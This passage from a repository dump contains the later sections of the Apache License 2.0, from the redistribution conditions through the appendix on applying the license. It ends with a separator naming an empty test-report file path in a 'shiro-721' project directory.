You may reproduce and distribute copies of the 91 | Work or Derivative Works thereof in any medium, with or without 92 | modifications, and in Source or Object form, provided that You 93 | meet the following conditions: 94 | 95 | (a) You must give any other recipients of the Work or 96 | Derivative Works a copy of this License; and 97 | 98 | (b) You must cause any modified files to carry prominent notices 99 | stating that You changed the files; and 100 | 101 | (c) You must retain, in the Source form of any Derivative Works 102 | that You distribute, all copyright, patent, trademark, and 103 | attribution notices from the Source form of the Work, 104 | excluding those notices that do not pertain to any part of 105 | the Derivative Works; and 106 | 107 | (d) If the Work includes a "NOTICE" text file as part of its 108 | distribution, then any Derivative Works that You distribute must 109 | include a readable copy of the attribution notices contained 110 | within such NOTICE file, excluding those notices that do not 111 | pertain to any part of the Derivative Works, in at least one 112 | of the following places: within a NOTICE text file distributed 113 | as part of the Derivative Works; within the Source form or 114 | documentation, if provided along with the Derivative Works; or, 115 | within a display generated by the Derivative Works, if and 116 | wherever such third-party notices normally appear. The contents 117 | of the NOTICE file are for informational purposes only and 118 | do not modify the License. You may add Your own attribution 119 | notices within Derivative Works that You distribute, alongside 120 | or as an addendum to the NOTICE text from the Work, provided 121 | that such additional attribution notices cannot be construed 122 | as modifying the License. 
123 | 124 | You may add Your own copyright statement to Your modifications and 125 | may provide additional or different license terms and conditions 126 | for use, reproduction, or distribution of Your modifications, or 127 | for any such Derivative Works as a whole, provided Your use, 128 | reproduction, and distribution of the Work otherwise complies with 129 | the conditions stated in this License. 130 | 131 | 5. Submission of Contributions. Unless You explicitly state otherwise, 132 | any Contribution intentionally submitted for inclusion in the Work 133 | by You to the Licensor shall be under the terms and conditions of 134 | this License, without any additional terms or conditions. 135 | Notwithstanding the above, nothing herein shall supersede or modify 136 | the terms of any separate license agreement you may have executed 137 | with Licensor regarding such Contributions. 138 | 139 | 6. Trademarks. This License does not grant permission to use the trade 140 | names, trademarks, service marks, or product names of the Licensor, 141 | except as required for reasonable and customary use in describing the 142 | origin of the Work and reproducing the content of the NOTICE file. 143 | 144 | 7. Disclaimer of Warranty. Unless required by applicable law or 145 | agreed to in writing, Licensor provides the Work (and each 146 | Contributor provides its Contributions) on an "AS IS" BASIS, 147 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 148 | implied, including, without limitation, any warranties or conditions 149 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 150 | PARTICULAR PURPOSE. You are solely responsible for determining the 151 | appropriateness of using or redistributing the Work and assume any 152 | risks associated with Your exercise of permissions under this License. 153 | 154 | 8. Limitation of Liability. 
In no event and under no legal theory, 155 | whether in tort (including negligence), contract, or otherwise, 156 | unless required by applicable law (such as deliberate and grossly 157 | negligent acts) or agreed to in writing, shall any Contributor be 158 | liable to You for damages, including any direct, indirect, special, 159 | incidental, or consequential damages of any character arising as a 160 | result of this License or out of the use or inability to use the 161 | Work (including but not limited to damages for loss of goodwill, 162 | work stoppage, computer failure or malfunction, or any and all 163 | other commercial damages or losses), even if such Contributor 164 | has been advised of the possibility of such damages. 165 | 166 | 9. Accepting Warranty or Additional Liability. While redistributing 167 | the Work or Derivative Works thereof, You may choose to offer, 168 | and charge a fee for, acceptance of support, warranty, indemnity, 169 | or other liability obligations and/or rights consistent with this 170 | License. However, in accepting such obligations, You may act only 171 | on Your own behalf and on Your sole responsibility, not on behalf 172 | of any other Contributor, and only if You agree to indemnify, 173 | defend, and hold each Contributor harmless for any liability 174 | incurred by, or claims asserted against, such Contributor by reason 175 | of your accepting any such warranty or additional liability. 176 | 177 | END OF TERMS AND CONDITIONS 178 | 179 | APPENDIX: How to apply the Apache License to your work. 180 | 181 | To apply the Apache License to your work, attach the following 182 | boilerplate notice, with the fields enclosed by brackets "[]" 183 | replaced with your own identifying information. (Don't include 184 | the brackets!) The text should be enclosed in the appropriate 185 | comment syntax for the file format. 
We also recommend that a 186 | file or class name and description of purpose be included on the 187 | same "printed page" as the copyright notice for easier 188 | identification within third-party archives. 189 | 190 | Copyright [yyyy] [name of copyright owner] 191 | 192 | Licensed under the Apache License, Version 2.0 (the "License"); 193 | you may not use this file except in compliance with the License. 194 | You may obtain a copy of the License at 195 | 196 | http://www.apache.org/licenses/LICENSE-2.0 197 | 198 | Unless required by applicable law or agreed to in writing, software 199 | distributed under the License is distributed on an "AS IS" BASIS, 200 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 201 | See the License for the specific language governing permissions and 202 | limitations under the License. 203 | -------------------------------------------------------------------------------- /shiro-721/target/failsafe-reports/TEST-org.apache.shiro.test.ContainerIntegrationIT.xml: -------------------------------------------------------------------------------- --------------------------------------------------------------------------------